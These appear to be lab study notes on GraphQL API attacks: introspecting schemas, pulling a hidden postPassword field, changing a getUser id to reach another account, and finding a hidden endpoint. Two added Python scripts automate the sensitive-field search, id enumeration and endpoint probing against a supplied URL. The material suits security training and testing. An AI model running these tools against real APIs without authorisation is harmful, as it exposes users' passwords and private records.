http://nathanrandal.com/graphql-visualizer/

https://github.com/nikitastupin/clairvoyance

Accessing private GraphQL posts

find the GraphQL endpoint in HTTP history

right click → run introspection query → paste the result into http://nathanrandal.com/graphql-visualizer/ → we find a postPassword field on the post type

send a normal GraphQL request to Repeater

we tweak the query so it also asks for the postPassword field (screenshot of the edited request not preserved)

Accidental exposure of private GraphQL fields

find the GraphQL endpoint in HTTP history

right click → run introspection query → save GraphQL query to site map

Target > Site map → send the saved getUser query to Repeater

we tweak the id argument until we hit the right user (id 1)
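The two procedures above (introspect, spot a sensitive field, then tweak a normal query until the right object comes back) as one script. This is an added example, not code from the page or from the lab; it assumes a JSON-over-POST endpoint reachable with urllib, a constructed sample introspection response, and an assumed root field name getBlogPost (only getUser and postPassword appear in the notes above).

```python
import json
import urllib.request

# Trimmed introspection document: root query type, every type, its fields and args.
INTROSPECTION_QUERY = """query { __schema { queryType { name }
  types { name kind fields { name args { name } type { name ofType { name } } } } } }"""

# Field names that usually should not be readable by an ordinary caller (assumed list).
SENSITIVE_WORDS = ("password", "secret", "token", "apikey", "ssn")


def post_graphql(url, query, variables=None):
    """POST a GraphQL document as JSON and return the decoded response."""
    body = json.dumps({"query": query, "variables": variables or {}}).encode()
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


def sensitive_fields(introspection):
    """Walk __schema.types and return [(type, field)] whose field name looks sensitive."""
    hits = []
    for t in introspection["data"]["__schema"]["types"]:
        if t["name"].startswith("__"):        # skip introspection meta-types
            continue
        for f in t.get("fields") or []:
            if any(w in f["name"].lower() for w in SENSITIVE_WORDS):
                hits.append((t["name"], f["name"]))
    return hits


def query_roots_returning(introspection, type_name):
    """Root query fields (name, [arg names]) whose result type is type_name."""
    schema = introspection["data"]["__schema"]
    root = schema["queryType"]["name"]
    out = []
    for t in schema["types"]:
        if t["name"] != root:
            continue
        for f in t.get("fields") or []:
            ft = f["type"]
            inner = ft.get("ofType") or {}        # unwrap NON_NULL / LIST wrappers one level
            if type_name in (ft.get("name"), inner.get("name")):
                out.append((f["name"], [a["name"] for a in f["args"]]))
    return out


def build_query(root_field, arg_name, arg_value, fields):
    """The 'tweaked' request, e.g. { getBlogPost(id: 3) { id postPassword } }."""
    return "{ %s(%s: %s) { %s } }" % (root_field, arg_name,
                                      json.dumps(arg_value), " ".join(fields))


def enumerate_ids(send, root_field, arg_name, fields, ids):
    """Try each id until the root field returns an object (the 'tweak until the
    right id' step). send(query) returns the decoded response. -> (id, obj) or None."""
    for i in ids:
        obj = (send(build_query(root_field, arg_name, i, fields)).get("data") or {}).get(root_field)
        if obj:
            return i, obj
    return None


# Constructed sample introspection response (not from a real target), shaped like
# one exposing BlogPost.postPassword and User.password.
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"},
    "types": [
        {"name": "Query", "kind": "OBJECT", "fields": [
            {"name": "getBlogPost", "args": [{"name": "id"}],
             "type": {"name": "BlogPost", "ofType": None}},
            {"name": "getUser", "args": [{"name": "id"}],
             "type": {"name": "User", "ofType": None}}]},
        {"name": "BlogPost", "kind": "OBJECT", "fields": [
            {"name": "id", "args": [], "type": {"name": "ID", "ofType": None}},
            {"name": "postPassword", "args": [], "type": {"name": "String", "ofType": None}}]},
        {"name": "User", "kind": "OBJECT", "fields": [
            {"name": "username", "args": [], "type": {"name": "String", "ofType": None}},
            {"name": "password", "args": [], "type": {"name": "String", "ofType": None}}]},
        {"name": "__Schema", "kind": "OBJECT", "fields": []}]}}}


if __name__ == "__main__":
    import sys
    schema = post_graphql(sys.argv[1], INTROSPECTION_QUERY)     # usage: script.py <endpoint url>
    for type_name, field in sensitive_fields(schema):
        print(type_name, field, query_roots_returning(schema, type_name))
```

Run it against the endpoint URL to get the same list the visualizer shows, then feed `enumerate_ids` a `send` wrapper around `post_graphql` with the root field and sensitive field names it printed.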

Finding a hidden GraphQL endpoint

active scan finds it with this request:

GET /api?query=query%7b__typename%7d

introspection is blocked on this endpoint
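The same discovery check done by hand: send the scanner's GET probe to a few candidate paths, decide from the JSON whether the path speaks GraphQL, then test whether a `__schema` query is refused. Added example, not code from the page; the candidate path list and the sample response bodies are constructed assumptions, and the "blocked" verdict is only "GraphQL errors, no data", nothing more.

```python
import json
import urllib.error
import urllib.parse
import urllib.request

PROBE_QUERY = "query{__typename}"                      # the request the scanner used
INTROSPECTION_PROBE = "query{__schema{queryType{name}}}"

# Assumed short list of common GraphQL paths to try when nothing shows in HTTP history.
CANDIDATE_PATHS = ("/graphql", "/api", "/api/graphql", "/graphql/api", "/graphql/graphql")


def probe_url(base, path, query):
    """GET form of a GraphQL query, e.g. /api?query=query%7B__typename%7D."""
    return base.rstrip("/") + path + "?query=" + urllib.parse.quote(query, safe="")


def classify(body):
    """'graphql'       -> data.__typename / data.__schema present: the path speaks GraphQL
       'graphql-error' -> GraphQL-shaped errors and no usable data: parsed, but refused
       'not-graphql'   -> anything else (HTML, 404 page, non-JSON)"""
    try:
        doc = json.loads(body)
    except (ValueError, TypeError):
        return "not-graphql"
    if not isinstance(doc, dict):
        return "not-graphql"
    data = doc.get("data") or {}
    if "__typename" in data or "__schema" in data:
        return "graphql"
    if isinstance(doc.get("errors"), list):
        return "graphql-error"
    return "not-graphql"


def introspection_blocked(body):
    """True when the __schema probe came back as a GraphQL error with no schema data."""
    return classify(body) == "graphql-error"


def error_messages(body):
    """Messages the server gave for a refused query (useful for seeing what it filters on)."""
    return [e.get("message", "") for e in json.loads(body).get("errors", [])]


def http_get(url):
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            return r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:      # 400/403 bodies still carry the GraphQL errors
        return e.read().decode("utf-8", "replace")


def find_endpoint(base, fetch=http_get):
    """Try each candidate path with the __typename probe; return (path, blocked) or None."""
    for path in CANDIDATE_PATHS:
        if classify(fetch(probe_url(base, path, PROBE_QUERY))) != "graphql":
            continue
        blocked = introspection_blocked(fetch(probe_url(base, path, INTROSPECTION_PROBE)))
        return path, blocked
    return None


# Constructed sample bodies (not captured from any real target).
SAMPLE_TYPENAME_OK = '{"data":{"__typename":"Query"}}'
SAMPLE_INTROSPECTION_BLOCKED = '{"errors":[{"message":"introspection is not allowed"}]}'
SAMPLE_HTML = "<!DOCTYPE html><html><body>Not found</body></html>"

if __name__ == "__main__":
    import sys
    print(find_endpoint(sys.argv[1]))                  # usage: script.py https://target
```

A `graphql-error` verdict on the `__typename` probe itself (rather than on the `__schema` probe) means the path parses GraphQL but rejected even that document, so check `error_messages` before moving on.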